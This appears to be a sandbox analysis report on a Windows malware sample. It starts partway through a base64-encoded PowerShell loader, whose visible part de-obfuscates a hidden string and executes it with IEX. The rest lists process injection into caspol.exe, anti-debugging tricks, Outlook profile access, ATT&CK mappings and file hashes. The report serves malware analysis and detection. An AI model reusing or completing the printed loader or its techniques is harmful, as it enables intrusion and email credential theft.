BBAGEAcgBzAGEALABIAGEAbAB2AGQAaQBTAGwAdQBkAHIAbgBTAGsAIABLAGEAdABVAG4AZABlAHIAIABwAGEAaQBjAG8AdgBCAGwAeQBhAG4AMgBwAGkAcwB0AGEAKQBCAGUAcwB0AGEAOwAKAE8AdQB0AGIAcgB9AAoATwB2AGUAcgB2ACIATQB1AHMAYwBsAEAACgBFAHYAZQBjAHQAJABFAHYAYQBsAHUARQBFAHQAdABlAHIAbgBoAGUAbQBhAHQAdABKAGEAZABlACAAdwBQAGUAcgBtAGEAaQBCAHIAbgBkAHMAMwBzAHUAbQBwAGIAPQBBAGwAbwBwAGkAWwBFAHgAYwB1AHMARQBMAGkAbQBuAG8AbgBHAGUAbgBiAHIAdABNAGkAcwBnAHIAdwBIAGUAcwBwAGUAaQBLAG8AbABiAHQAMQBNAHUAbAB0AGkAXQBiAGUAZgBhAGUAOgBUAGkAbABzAGEAOgBQAG8AcwBlAHIAVgBwAGEAYwBoAHkAaQBVAGQAbABvAGUAcgBCAGkAcwB0AGEAdABSAGUAZwBsAGUAdQBGAG8AcgBnAHkAYQBTAHUAYgBjAHkAbABDAHIAdQBtAGIAQQBVAGsAbwBuAHQAbABSAGUAZABpAHYAbABOAG8AbgBzAGUAbwBHAGwAcwBuAGkAYwBVAGQAcwB0AHkAKABDAG8AZABhAGUAMABSAG8AcwBpAG4ALABVAG4AaQBuAGoAMQBaAG8AbgBlAGkAMABTAHQAbwBmAHAANABIAHUAbQBiAGwAOABJAG0AbQB5ACAANQBLAHYAYQBsAGkANwBMAG8AcgBpAGwANgBFAGQAYgBzACAALABTAG0AcwAgAEYAMQBVAHMAbwBsAGkAMgB1AGQAcgBlAG4AMgBTAHQAZQByAGMAOABCAHIAdQBnAHMAOABTAGMAeQBwAGgALABSAGEAdABpAG8ANgBVAG4AbgBvAGkANABTAGwAdQBrAG4AKQAKAFAAcgBvAGwAbwAkAFIAaQBwAG8AcwBEAE4AbwBuAHAAcgBhAG4AZQB1AHIAbwBnAEkAbgBkAGkAcwBsAFIAdQBuAGEAdwBpAGoAdQBtAGIAaQBnAEkAbgBlAGIAcgA9AGIAbwB5AGEAcgAoAEMAbABvAHQAaABHAGIAcgB5AGEAbgBlAFMAdABhAG0AbQB0AFYAcgBkAGkAZgAtAEQAbwBsAG0AZQBJAHUAZABzAGsAeQB0AFQAZQByAHUAdABlAFQAeQBsAG8AYwBtAEEAZgB0AGUAbgBQAFAAcgBlAGQAZQByAFMAdAByAGkAcABvAEQAeQBrAG4AaQBwAEMAZQBzAHQAdQBlAFMAdABhAHIAbAByAEsAYQB0AHQAZQB0AEwAaQBtAG0AZQB5AFAAYQBnAGUAaAAgAFMAZQBuAGcAZQAtAEYAcgBlAG0AZgBQAFQAZQBrAHMAdABhAEUAawBzAHAAYQB0AEEAbQBiAGwAeQBoAFAAZQBlAGsAcwAgAFMAdQBwAHAAbwAiAEsAbwBsAGwAZQBIAEkAbgBjAG8AcgBLAEMAaAByAGUAbQBDAEwAYQB0AHUAawBVAFIAYQBuAGcAbAA6AE0AaQBzAGIAZQBcAFMAdABlAGEAZABTAEEAZgB0AGUAZwBvAFMAawBhAGIAZQBmAFcAaQBlAHIAYQB0AEUAdABoAGUAcgB3AEIAcgBuAGUAcABhAFMAaQBuAGUAYwByAFMAdABvAHIAZgBlAEYAbwByAHAAYQBcAFIAZQBmAHUAcwBQAEIAbABhAGEAcABhAEIAZQBlAHQAbABsAE4AcgBlACAATABhAFMAdAB1AGMAawBlAFMAdABlAGEAdABvAEUAbABlAGMAdAB6AEkAbgBzAGkAcwBvAE4AbwBuAGUAeAAiAFkAdQByAHQAcwApAEIAcgBvAGQAZQAuAFQAYQBuAGsAYQBQAFYAaQBkAGUAbwB1AHQAZQBvAGQAbwBsAE8AZQBzAHQAZQBjAHQAcgBhAG4AcwAxAFQAZQBuAG4AaQAwAEYAbABhAGcAZQA1AAoAUwBwAGEAcgByACQATQBhAGMAaQBuAFcASwBkAGUAaABhAGkAQgByAHUAZwBzAHMAQQB1AHQAbwBtAGgAVABoAHkAcgBvAHQAcwB0AGEAYQBsAGsASQBuAGcAaQAgAG8AVAB3AGkAbgBiAG0AUwB1AGQAZQByAG0ARQB4AGEAbQBpACAAcwBrAG8AbQBhAD0ATABpAG0AbgBpACAAUwB1AHMAaQAgAFsAUwBvAHIAcgBvAFMAUwBrAHYAYQBsAHkASAB5AHAAcABlAHMARQB1AGwAbwBnAHQAUAB5AHIAbwBzAGUAcwB1AHAAZQByAG0AUwBvAGwAZgByAC4ASQBuAHMAbwBsAEMASwBrAGsAZQBuAG8AdABvAGwAdgB0AG4AUAB1AGUAcgBwAHYAYQBuAGQAbwByAGUAVgBhAGEAZAAgAHIAUAB5AGwAbwByAHQAdABhAHYAZQByAF0AUwB5AG4AdABvADoARQBxAHUAaQBsADoAVABhAGwAawB3AEYATQB1AG0AaQBlAHIAQQBiAG8AcgB0AG8ARwB1AGQAcwBmAG0AZwBhAHMAZgB5AEIAdQBkAHMAbQB5AGEAUwBxAHUAYQBtAHMAVQBmAGQAdABlAGUAcwBwAGkAbABsADYAUwB0AG8AbQBhADQAQQBuAGQAZQByAFMAUABvAGwAaQB0AHQASwB1AHYAZQByAHIAaQBuAGQAZQBuAGkAUwB0AHIAcgBlAG4AQwBsAGkAbgBpAGcATgB5AGgAZQBkACgARQB4AG8AbQBwACQATABpAHYAcwBtAEQAUgBlAHQAcgBhAGEAQQByAGsAdABpAGcAQQBmAGcAcgBzAGwAQgBhAGMAawB1AGkARABoAGEAcgBtAGcASwBvAHIAdABlACkACgBQAGEAbABtAGUAWwBEAGUAaQBuAGsAUwBmAGEAcgBhAG8AeQBNAG8AdABoAGUAcwBLAG8AbQBtAGEAdABqAGEAdQBuAGQAZQBUAGkAbABiAHUAbQBLAG8AbQBtAGEALgBTAGsAcgB1AG4AUgBTAGgAbwB3AGcAdQBBAG4AdABpAHQAbgBBAHIAYwBoAGUAdABDAGEAcABpAHQAaQBMAGEAcgByAGUAbQBFAGYAdABlAHIAZQBBAHQAdAByAGkALgBCAGEAYwB0AGUASQBMAGUAcAB0AG8AbgBEAGkAcwBwAGUAdABSAGEAdABpAGYAZQBHAGwAbwBiAGEAcgBBAGQAZQBuAG8AbwBCAHIAeQBzAHQAcABGAGwAYQBuAHIAUwBIAGkAeQBhAGsAZQBSAGUAdAByAGkAcgBQAGEAbgBkAGkAdgBkAHUAbQBtAGUAaQBIAGEAZgBnAGEAYwBOAG8AbgBjAHUAZQBkAHIAdQBrAG0AcwBCAGwAbwBkAHIALgBmAG8AcgB0AGgATQBQAGgAaQBsAG8AYQBJAGcAbgBhAHQAcgBtAGEAawBhAGIAcwBJAG4AcwB0AHIAaABBAGwAZABlAHIAYQBLAGEAcwBzAGUAbABNAGEAbABhAGMAXQBNAGcAdABpAGcAOgBEAGoAaQBiAG8AOgBTAHQAdQBtAG0AQwBTAHQAcgBhACAAbwBHAHIAdQBwAHAAcABVAG4AbQBvAGQAeQBSAGUAZwBpAHMAKABNAGQAZQB0AGkAJABEAGkAcwB0AHIAVwBGAGEAdQBuAGEAaQBZAG8AdQBuAGcAcwBCAGEAbQBiAHUAaABIAHUAbABrAG8AdABOAGEAaQBmACAAawBWAGUAbABhAG4AbwB2AGkAbgBkAGkAbQBBAGEAcgBzAHUAbQBQAHMAZQB1AGQALAB1AG4AYwBvAG4AIABTAGsAYQBtAHMAMABEAGkAbABkAG8ALABDAGgAYQBtAHAAIABQAHIAbwB0AG8AIABTAGEAbQBhAG4AJABQAHIAZQBlAGQARQBCAGwAbwBtAHMAbgBJAG4AZgBhAHIAdABMAHkAcwBhAGEAdwBKAHUAeAB0AGEAaQBMAGkAbQBmAGEAMwBTAGEAdQB2AGUALABIAGoAZQBtAG0AIABUAHkAbgBkAHMAJABEAG8AcgBvAHQAVwBEAHIAZQBhAG0AaQBQAGkAbQBwAGUAcwBSAGUAZwBuAGUAaABIAHUAcwBtAG4AdABBAHQAbQBvAGcAawBNAGEAbgBnAGUAbwBEAGQAcwBkAGEAbQBUAHUAcABhAGkAbQBCAHIAdQBnAGUALgBGAGUAcgByAHUAYwBUAGUAbABlAGYAbwBTAHQAcgBlAGEAdQBJAG4AdAByAGkAbgBPAHAAcABvAHMAdABTAGwAdQB0AHQAKQBNAGEAYwBhAHIAOwAKAE0AYQBuAGQAdQBbAEIAdQBtAG0AYQBFAFMAcwBzAHIAIABuAE0AYQBpAGQAYQB0AFQAYQBnAGUAdAB3AEIAaQBzAGUAbgBpAE0AbwBuAHQAZwAxAEgAZQByAG0AYQBdAEMAZQBuAHQAcgA6AEUAbgB0AGUAcgA6AFAAdQBsAHAAaQBFAE8AbQBnAHIAdQBuAFIAYQBwAHQAbwB1AE0AbwBkAGUAaABtAEwAaQBtAGkAdABTAFUAbgBoAGUAYQB5AEgAbwByAHQAbwBzAHMAZQByAHUAbQB0AFQAdwBhAGkAdABlAEEAawB0AGkAZQBtAFIAZQBnAGkAZQBMAFAAYQBuAGQAdQBvAFYAbwBsAGEAcABjAFMAbgByAGUAbABhAEMAYQBwAGkAbABsAE0AYQBhAGwAZQBlAE0AaQBkAHMAdABzAFMAdQBwAGUAcgBBAGUAcgBmAGEAcgAoAFMAbgBpAGcAbQAkAFMAawBvAG4AbgBFAFAAbwBkAGcAaQBuAEEAZgB0AGUAcgB0AFAAZQByAHMAbwB3AEkAbgBkAHQAcgBpAFQAcgB2AGUAcwAzAEIAcgBuAGUAbQAsAEYAbwBkAGIAbwAgAEEAbABkAGEAeQAwAE4AYQByAGsAbwApAEsAZQBtAGkAZwAjAAoAJwBAAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0ANQA7ACAAJABpACAALQBsAHQAIAAkAEwAYQBwAHAAZQBuAHMAZgBpAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAVABlAHQAcgBhAHMAcABvAHIAbwAgAD0AIAAkAFQAZQB0AHIAYQBzAHAAbwByAG8AIAArACAAJABMAGEAcABwAGUAbgBzAGYAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEwAYQBwAHAAZQBuAHMAZgBpAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFQAZQB0AHIAYQBzAHAAbwByAG8AIAA9ACAAJABUAGUAdAByAGEAcwBwAG8AcgBvACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAVABlAHQAcgBhAHMAcABvAHIAbwANAAoA"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_utbmzil.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12B8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC12B7.tmp"
4⤵
PID:1804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
3⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES12B8.tmp

Filesize
1KB

MD5
ac8ee39e5dad71ac6ef1b925891a45f1

SHA1
9ca9b9a40064e179e974d91558c39eba0171fc82

SHA256
470733b670ada653ede951acca2628aa80d592fd2be0a915185b90bd4130989b

SHA512
c4b79815c791fb763ccc996884d6b2269041e321ae8254ead72f47c10b79f0c6362b0e93ec17d7fa5b6d4754c143bb9095ffef5b7852a96e1afcc7a1bc758074

Download Submit
C:\Users\Admin\AppData\Local\Temp\_utbmzil.dll

Filesize
4KB

MD5
5bb1066d65907a872c0bc9f3d20f2b19

SHA1
9743304e93521324a5e970efdd0ec4d7a736bdc1

SHA256
4d8bbf1fae7d228382bd5bc65a2e0ccd92c82753c41ebea1f8b65c02b818bda3

SHA512
5c28801eec0f384467b442a6c3d52281ca928f5d7cff0132e224537a9770104285fa928f0918402598c295440e6a8b6fa646bed317e8d0638ef22a34d6d1be35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_utbmzil.pdb

Filesize
7KB

MD5
a793605dd434a2ba301da8db0a63e240

SHA1
4e4ace15aa69fb8f7a2cf379c630b75b9eea0db8

SHA256
038d1a97100c2cee954f8972004102f49236de374416f8ea5bb321b62a8c6644

SHA512
aa9b66021d02ac48a5f93f13f7fe3fe46c6ffa6157df45e021a7c86525fe073d4d60c6040924a0bb7d5173647b48418eb31bff1fc6954770348af1cca9e7f440

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC12B7.tmp

Filesize
652B

MD5
788509572223d20de39e02a3709a9a32

SHA1
7e51042c240a6afde5ebed8984af6a411e812182

SHA256
ff8930420df34a249e7db600b464d3ea7914247c3d6facdf454e2dbab27882ae

SHA512
8f6bd5a7e89434c38cbec614ed9c4610c4e377686ddb7a1c1c89890c9b1a86b50c1e01241aafef34f2999fb094e2906812e45b39b5a3e22bdba345826f1ecc2f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_utbmzil.0.cs

Filesize
789B

MD5
c90e793d8f1cc2305dc4db17fbab8638

SHA1
abf293e434e07382dd7dd68e1da98ea81af6ead9

SHA256
ce5c364582e9b46141a06dcb4c43bf0f5ee85684d14950fd20f054e6ef4d2d5a

SHA512
fd97f691216d0cff9990ccf0c6db19a6917edc4e43627316ed0223c293f7eeaa2372043c8d0114d78cc230fbc523c9e1eca29d73be28fb1e5f77df0fd4f8d07f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_utbmzil.cmdline

Filesize
309B

MD5
e1fbc3bd80cc3320f256c718e3041ab6

SHA1
487e5b8b22691193cc38922e545c9e3a997c80a6

SHA256
82e4b9eedb76d303d258fa69d57e4068c8841d766e447773879abce265a67a21

SHA512
0ce50b927437ab3010cebb895223f34ffdbfbc83d14c8f8e89f584ea68f4480627d64b009d3b037b1ea0b5843785f8717d9c9ba859f970940f27418ff91fcce4

Download Submit
memory/556-73-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/556-67-0x0000000074210000-0x00000000747BB000-memory.dmp

Filesize
5.7MB

Download
memory/556-86-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/556-57-0x0000000074210000-0x00000000747BB000-memory.dmp

Filesize
5.7MB

Download
memory/556-56-0x00000000757A1000-0x00000000757A3000-memory.dmp

Filesize
8KB

Download
memory/556-55-0x0000000000000000-mapping.dmp

Download
memory/556-66-0x0000000005A90000-0x0000000005B90000-memory.dmp

Filesize
1024KB

Download
memory/556-81-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/556-70-0x0000000077790000-0x0000000077939000-memory.dmp

Filesize
1.7MB

Download
memory/556-88-0x0000000005A90000-0x0000000005B90000-memory.dmp

Filesize
1024KB

Download
memory/556-89-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/556-72-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/576-58-0x0000000000000000-mapping.dmp

Download
memory/960-54-0x000007FEFC011000-0x000007FEFC013000-memory.dmp

Filesize
8KB

Download
memory/1316-78-0x0000000077790000-0x0000000077939000-memory.dmp

Filesize
1.7MB

Download
memory/1316-80-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/1316-79-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/1316-82-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1316-83-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1316-85-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1316-87-0x0000000000080000-0x0000000000180000-memory.dmp

Filesize
1024KB

Download
memory/1316-74-0x0000000000080000-0x0000000000180000-memory.dmp

Filesize
1024KB

Download
memory/1316-71-0x0000000000A6768E-mapping.dmp

Download
memory/1316-90-0x0000000077790000-0x0000000077939000-memory.dmp

Filesize
1.7MB

Download
memory/1316-91-0x0000000077970000-0x0000000077AF0000-memory.dmp

Filesize
1.5MB

Download
memory/1804-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads